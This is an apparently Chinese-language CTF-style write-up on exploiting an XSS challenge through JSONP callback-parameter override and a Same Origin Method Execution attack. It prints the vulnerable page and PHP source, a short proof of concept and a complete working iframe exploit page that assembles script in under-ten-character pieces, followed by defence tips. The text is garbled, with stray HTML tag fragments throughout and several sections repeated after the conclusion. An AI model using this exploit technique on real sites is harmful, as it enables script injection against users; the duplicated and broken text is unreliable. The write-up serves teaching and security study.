SOME攻击实现XSS漏洞利用教学文档<\/h1>

1. 漏洞背景<\/h2>
这道XSS题目要求执行`alert(document.domain)<\/code>，但存在一些限制条件。通过分析，我们可以使用SOME(Same Origin Method Execution)攻击来实现目标。<\/p>`

2. 代码审计分析<\/h2>
2.1 index.html关键代码<\/h3>
var<\/span> callback<\/span> =<\/span> function<\/span>(msg<\/span>) {
<\/span><\/span>    result<\/span>.innerHTML<\/span> =<\/span> msg<\/span>;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>document.addEventListener<\/span>('DOMContentLoaded'<\/span>, function<\/span>(event<\/span>) {
<\/span><\/span>    if<\/span>(getQuery<\/span>('code'<\/span>)) {
<\/span><\/span>        var<\/span> code<\/span> =<\/span> getQuery<\/span>('code'<\/span>);
<\/span><\/span>        c<\/span>.value<\/span> =<\/span> code<\/span>;
<\/span><\/span>        checkCode<\/span>(code<\/span>);
<\/span><\/span>    }
<\/span><\/span>});
<\/span><\/span>
<\/span><\/span>form<\/span>.addEventListener<\/span>('submit'<\/span>, function<\/span>(event<\/span>) {
<\/span><\/span>    checkCode<\/span>(c<\/span>.value<\/span>);
<\/span><\/span>    event<\/span>.preventDefault<\/span>();
<\/span><\/span>});
<\/span><\/span>
<\/span><\/span>function<\/span> checkCode<\/span>(code<\/span>) {
<\/span><\/span>    var<\/span> s<\/span> =<\/span> document.createElement<\/span>('script'<\/span>);
<\/span><\/span>    s<\/span>.src<\/span> =<\/span> `\/xss_2020-06\/check_code.php?callback=callback&code=<\/span>${<\/span>encodeURI(code<\/span>)}<\/span>`<\/span>;
<\/span><\/span>    document.body<\/span>.appendChild<\/span>(s<\/span>);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>function<\/span> getQuery<\/span>(name<\/span>) {
<\/span><\/span>    return<\/span> new<\/span> URL<\/span>(location<\/span>.href<\/span>).searchParams<\/span>.get<\/span>(name<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>关键点：<\/p>

两种触发方式：URL中的code参数或表单提交<\/li>
checkCode<\/code>函数使用encodeURI<\/code>对code参数进行编码<\/li>
创建script标签加载JSONP端点<\/li>
<\/ul>
2.2 check_code.php关键代码<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>$callback =<\/span> "callback"<\/span>;
<\/span><\/span>if<\/span>(isset<\/span>($_GET['callback'<\/span>])) {
<\/span><\/span>    $callback =<\/span> preg_replace<\/span>("\/[^a-z0-9.]+\/i"<\/span>, ""<\/span>, $_GET['callback'<\/span>]);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>$key =<\/span> ""<\/span>;
<\/span><\/span>if<\/span>(isset<\/span>($_GET['code'<\/span>])) {
<\/span><\/span>    $key =<\/span> $_GET['code'<\/span>];
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>if<\/span>(mb_strlen<\/span>($key, "UTF-8"<\/span>) <=<\/span> 10<\/span>) {
<\/span><\/span>    if<\/span>($key ==<\/span> "XSS_ME"<\/span>) {
<\/span><\/span>        $result =<\/span> "Okay! You can access <a href='#not-implemented'>the secret page<\/a>!"<\/span>;
<\/span><\/span>    } else<\/span> {
<\/span><\/span>        $result =<\/span> "Invalid code: '<\/span>$key<\/span>'"<\/span>;
<\/span><\/span>    }
<\/span><\/span>} else<\/span> {
<\/span><\/span>    $result =<\/span> "Invalid code: too long"<\/span>;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>$json =<\/span> json_encode<\/span>($result, JSON_HEX_TAG<\/span>);
<\/span><\/span>header<\/span>('X-XSS-Protection: 0'<\/span>);
<\/span><\/span>header<\/span>('X-Content-Type-Options: nosniff'<\/span>);
<\/span><\/span>header<\/span>('Content-Type: text\/javascript; charset=utf-8'<\/span>);
<\/span><\/span>print<\/span> "<\/span>$callback<\/span>(<\/span>$json<\/span>)"<\/span>;
<\/span><\/span><\/code><\/pre>限制条件：<\/p>

callback参数过滤：只允许字母数字和点号[^a-z0-9.]+<\/code><\/li>
code参数长度限制：不超过10个字符<\/li>
返回结果中固定包含"Invalid code: "字符串<\/li>
<\/ol>
3. 漏洞利用原理<\/h2>
3.1 基本利用思路<\/h3>

encodeURI<\/code>不会编码&<\/code>字符，可以在code参数中注入&callback=alert<\/code>来覆盖原有callback值<\/li>
服务器会使用参数的最后一次出现值，因此可以覆盖callback参数<\/li>
<\/ol>
3.2 简单PoC<\/h3>
表单提交：<\/p>
1&callback=alert
<\/code><\/pre>
URL参数：<\/p>
?code=1%26callback=alert
<\/code><\/pre>
3.3 复杂利用挑战<\/h3>
由于需要执行alert(document.domain)<\/code>且code参数长度限制为10个字符，直接执行不可行，需要使用SOME攻击。<\/p>
4. SOME攻击实现<\/h2>
4.1 SOME攻击概念<\/h3>
Same Origin Method Execution (SOME)是一种利用同源策略的漏洞，允许攻击者在目标网站上执行任意JavaScript方法。<\/p>
4.2 攻击步骤<\/h3>

使用iframe确保同源<\/li>
通过多个iframe和相同来源的跨iframe操作<\/li>
将payload包含到iframe框架的DOM中<\/li>
使用document.write<\/code>逐步构建payload<\/li>
使用注释符处理多余的"Invalid code: "字符串<\/li>
<\/ol>
4.3 完整利用代码<\/h3>
<iframe<\/span> src<\/span>=<\/span>"https:\/\/vulnerabledoma.in\/xss_2020-06\/"<\/span> name<\/span>=<\/span>"x"<\/span> onload<\/span>=<\/span>"go()"<\/span>><\/iframe<\/span>>
<\/span><\/span><iframe<\/span> src<\/span>=<\/span>"https:\/\/vulnerabledoma.in\/xss_2020-06\/"<\/span> name<\/span>=<\/span>"y"<\/span> id<\/span>=<\/span>"m"<\/span>><\/iframe<\/span>>
<\/span><\/span><iframe<\/span> src<\/span>=<\/span>"https:\/\/vulnerabledoma.in\/xss_2020-06\/"<\/span> name<\/span>=<\/span>"alert(document.domain)"<\/span>><\/iframe<\/span>>
<\/span><\/span>
<\/span><\/span><script<\/span>>
<\/span><\/span>function<\/span> loadIframe<\/span>(payload<\/span>){
<\/span><\/span>    return<\/span> new<\/span> Promise(resolve<\/span> => {
<\/span><\/span>        m<\/span>.src<\/span> =<\/span> `https:\/\/vulnerabledoma.in\/xss_2020-06\/?code=<\/span>${<\/span>payload<\/span>}<\/span>%26callback=top.x.document.write`<\/span>;
<\/span><\/span>        m<\/span>.onload<\/span> =<\/span> function<\/span>(){
<\/span><\/span>            return<\/span> resolve<\/span>(this<\/span>);
<\/span><\/span>        }
<\/span><\/span>    });
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>async<\/span> function<\/span> go<\/span>(){
<\/span><\/span>    await<\/span> loadIframe<\/span>("<script>\/*"<\/span>);
<\/span><\/span>    await<\/span> loadIframe<\/span>("*\/eval(\/*"<\/span>);
<\/span><\/span>    await<\/span> loadIframe<\/span>("*\/top[2]\/*"<\/span>);
<\/span><\/span>    await<\/span> loadIframe<\/span>("*\/.name)\/\/"<\/span>);
<\/span><\/span>    await<\/span> loadIframe<\/span>("<\\/script>"<\/span>);
<\/span><\/span>}
<\/span><\/span><\/script<\/span>>
<\/span><\/span><\/code><\/pre>4.4 代码解析<\/h3>


创建三个iframe：<\/p>

第一个iframe(name="x")用于执行主逻辑<\/li>
第二个iframe(id="m")用于发送payload<\/li>
第三个iframe(name="alert(document.domain)")存储要执行的代码<\/li>
<\/ul>
<\/li>

loadIframe<\/code>函数：<\/p>

通过修改iframe的src属性发送payload<\/li>
使用%26callback=top.x.document.write<\/code>覆盖callback参数<\/li>
返回Promise确保顺序执行<\/li>
<\/ul>
<\/li>

go<\/code>函数：<\/p>

分步发送payload，每步不超过10字符限制<\/li>
使用注释符\/* *\/<\/code>处理多余字符串<\/li>
最终组合成<script>eval(top[2].name)<\/script><\/code>执行第三个iframe的name属性<\/li>
<\/ul>
<\/li>
<\/ol>
5. 关键技巧总结<\/h2>

参数覆盖<\/strong>：利用encodeURI<\/code>不编码&<\/code>的特性覆盖callback参数<\/li>
分块传输<\/strong>：将长payload分成多个不超过10字符的片段<\/li>
注释技巧<\/strong>：使用\/* *\/<\/code>注释掉多余的"Invalid code: "字符串<\/li>
跨iframe通信<\/strong>：利用同源iframe间的top<\/code>对象访问<\/li>
异步控制<\/strong>：使用Promise确保payload按顺序执行<\/li>
DOM操作<\/strong>：通过document.write<\/code>动态写入脚本<\/li>
<\/ol>
6. 防御建议<\/h2>

对callback参数进行更严格的过滤<\/li>
限制JSONP端点的使用，或使用CORS替代<\/li>
对所有用户输入进行严格编码<\/li>
实现CSRF令牌保护表单<\/li>
使用Content Security Policy (CSP)限制脚本执行<\/li>
<\/ol>
通过这种SOME攻击方法，我们成功绕过了长度限制和字符过滤，最终实现了alert(document.domain)<\/code>的执行。<\/p>

SOME攻击实现XSS漏洞利用教学文档<\/h1>

1. 漏洞背景<\/h2> 这道XSS题目要求执行alert(document.domain)<\/code>，但存在一些限制条件。通过分析，我们可以使用SOME(Same Origin Method Execution)攻击来实现目标。<\/p>

3. 漏洞利用原理<\/h2>

3.3 复杂利用挑战<\/h3> 由于需要执行alert(document.domain)<\/code>且code参数长度限制为10个字符，直接执行不可行，需要使用SOME攻击。<\/p>

4.1 SOME攻击概念<\/h3> Same Origin Method Execution (SOME)是一种利用同源策略的漏洞，允许攻击者在目标网站上执行任意JavaScript方法。<\/p>

1. 漏洞背景<\/h2>
这道XSS题目要求执行`alert(document.domain)<\/code>，但存在一些限制条件。通过分析，我们可以使用SOME(Same Origin Method Execution)攻击来实现目标。<\/p>`

3.3 复杂利用挑战<\/h3>
由于需要执行`alert(document.domain)<\/code>且code参数长度限制为10个字符，直接执行不可行，需要使用SOME攻击。<\/p>`

4.1 SOME攻击概念<\/h3>
Same Origin Method Execution (SOME)是一种利用同源策略的漏洞，允许攻击者在目标网站上执行任意JavaScript方法。<\/p>